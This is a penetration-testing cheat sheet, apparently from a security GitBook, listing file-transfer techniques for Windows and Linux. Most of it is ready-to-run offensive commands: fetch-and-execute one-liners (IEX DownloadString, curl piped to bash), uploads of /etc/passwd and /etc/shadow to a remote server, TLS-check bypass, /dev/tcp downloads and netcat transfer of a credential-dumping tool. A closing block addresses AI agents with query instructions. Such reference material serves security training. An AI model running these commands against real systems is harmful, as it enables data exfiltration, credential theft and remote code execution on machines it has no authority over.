# File Transfer Techniques

### 🔧 Living Off The Land (LOLBAS & GTFOBins)

Use native system binaries to transfer files stealthily.

* **LOLBAS**: <https://lolbas-project.github.io/>
* **GTFOBins**: <https://gtfobins.github.io/>

***

## 🪟 Windows File Transfer Methods

#### ✅ Hash Checking

```powershell
# Linux
md5sum id_rsa

# PowerShell
Get-FileHash C:\Users\Public\id_rsa -Algorithm MD5
```

***

#### 🔐 Base64 Encode/Decode

```bash
# Encode (Linux)
cat id_rsa | base64 -w 0; echo

# Encode (PowerShell)
[Convert]::ToBase64String((Get-Content -Path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

# Decode (PowerShell)
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64String>"))

# Decode (Linux)
echo <base64String> | base64 -d > hosts
```

***

#### 🌐 PowerShell File Download

```powershell
powershellCopyEdit(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
Invoke-WebRequest <Target File URL> -OutFile PowerView.ps1
```

***

#### 📦 SMB File Transfer

```bash
# Set up SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

```powershell
# Download from SMB Server
copy \\192.168.220.133\share\nc.exe C:\Temp\nc.exe

# Upload to SMB Server
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
```

***

#### 📁 WebDAV File Transfer

```bash
# Set up WebDAV Server
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

```powershell
# Access WebDAV
dir \\192.168.49.128\DavWWWRoot

# Upload
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
```

***

#### 📡 FTP Transfer

```bash
# Set up FTP Server
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
```

```powershell
powershellCopyEdit# Download
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

# Upload
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

***

#### ⬆️ Upload Server

```bash
pip3 install uploadserver
python3 -m uploadserver
```

```powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
```

***

#### 💡 Base64 Upload via Web

```powershell
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

```bash
nc -lvnp 8000 # Catch the file
```

***

#### 🧨 Fileless Execution (Memory)

```powershell
IEX (New-Object Net.WebClient).DownloadString('<Target File URL>')
(New-Object Net.WebClient).DownloadString('<Target File URL>') | IEX
```

***

#### 🚫 Bypass Protections

```powershell
# IE Config Bypass
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

# SSL/TLS Error Bypass
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

***

## 🐧 Linux File Transfer Methods

#### ✅ MD5 Hash Check

```bash
md5sum id_rsa
```

#### 🔐 Base64 Encode/Decode

```bash
# Encode
cat id_rsa | base64 -w 0; echo

# Decode
echo -n '<base64String>' | base64 -d > id_rsa
```

***

#### 🌐 Download Tools

```bash
wget <url> -O <output-file>
curl -o <output-file> <url>
```

#### 📡 TCP-Based Download

```bash
exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3
cat <&3
```

***

#### 🔄 SCP (SSH Transfer)

```bash
# Download
scp plaintext@192.168.49.128:/root/myroot.txt /home/myuser/myroot.txt

# Upload
scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```

***

#### 🧾 Upload Server with Certificate

```bash
sudo python3 -m pip install --user uploadserver
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

```bash
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

***

#### 🌐 Web Servers

```bash
python3 -m http.server
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
```

***

#### 🧨 Fileless Download

```bash
curl <url> | bash
wget -qO- <url> | python3
```

***

### 👨‍💻 Transferring Files with Scripting Languages

#### 🐍 Python

```bash
# Download
python2.7 -c 'import urllib;urllib.urlretrieve ("<url>", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("<url>", "LinEnum.sh")'

# Upload
python3 -m uploadserver
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
```

***

#### 🐘 PHP

```bash
# Download
php -r '$file = file_get_contents("<url>"); file_put_contents("LinEnum.sh",$file);'
php -r 'const BUFFER = 1024; $fremote = fopen("<url>", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Execute in Bash
php -r '$lines = @file("<url>"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```

***

#### 💎 Ruby

```bash
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("<url>")))'
```

***

#### 🐪 Perl

```bash
perl -e 'use LWP::Simple; getstore("<url>", "LinEnum.sh");'
```

***

#### 🧠 JavaScript (wget.js)

```javascript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

```bash
bashCopyEditcscript.exe /nologo wget.js <url> PowerView.ps1
```

***

#### 📜 VBScript (wget.vbs)

```vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

```bash
cscript.exe /nologo wget.vbs <url> PowerView2.ps1
```

***

### 🧰 Miscellaneous File Transfer

#### 🔊 Netcat

```bash
# Listener
nc -l -p 443 > SharpKatz.exe
ncat -l -p 443 --recv-only > SharpKatz.exe

# Sender
nc -q 0 192.168.49.128 443 < SharpKatz.exe
ncat --send-only 192.168.49.128 443 < SharpKatz.exe
```

***

#### 📂 Mount Linux Directory (RDP)

```bash
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

***

### 🌐 Upload with Nginx (WebDAV)

```bash
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

# Create config
sudo bash -c 'cat > /etc/nginx/sites-available/upload.conf <<EOF
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root    /var/www/uploads;
        dav_methods PUT;
    }
}
EOF'

sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo rm /etc/nginx/sites-enabled/default
sudo systemctl restart nginx.service
tail -2 /var/log/nginx/error.log

# Upload test
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt
```

***

### 🔐 File Protection with Encryption

#### PowerShell – AES Encryption

```powershell
Import-Module .\Invoke-AESEncryption.ps1

# Encrypt
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt

# Decrypt
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Path file.aes
```

***

#### OpenSSL – AES Encryption

```bash
# Encrypt
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/file-transfer-techniques.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.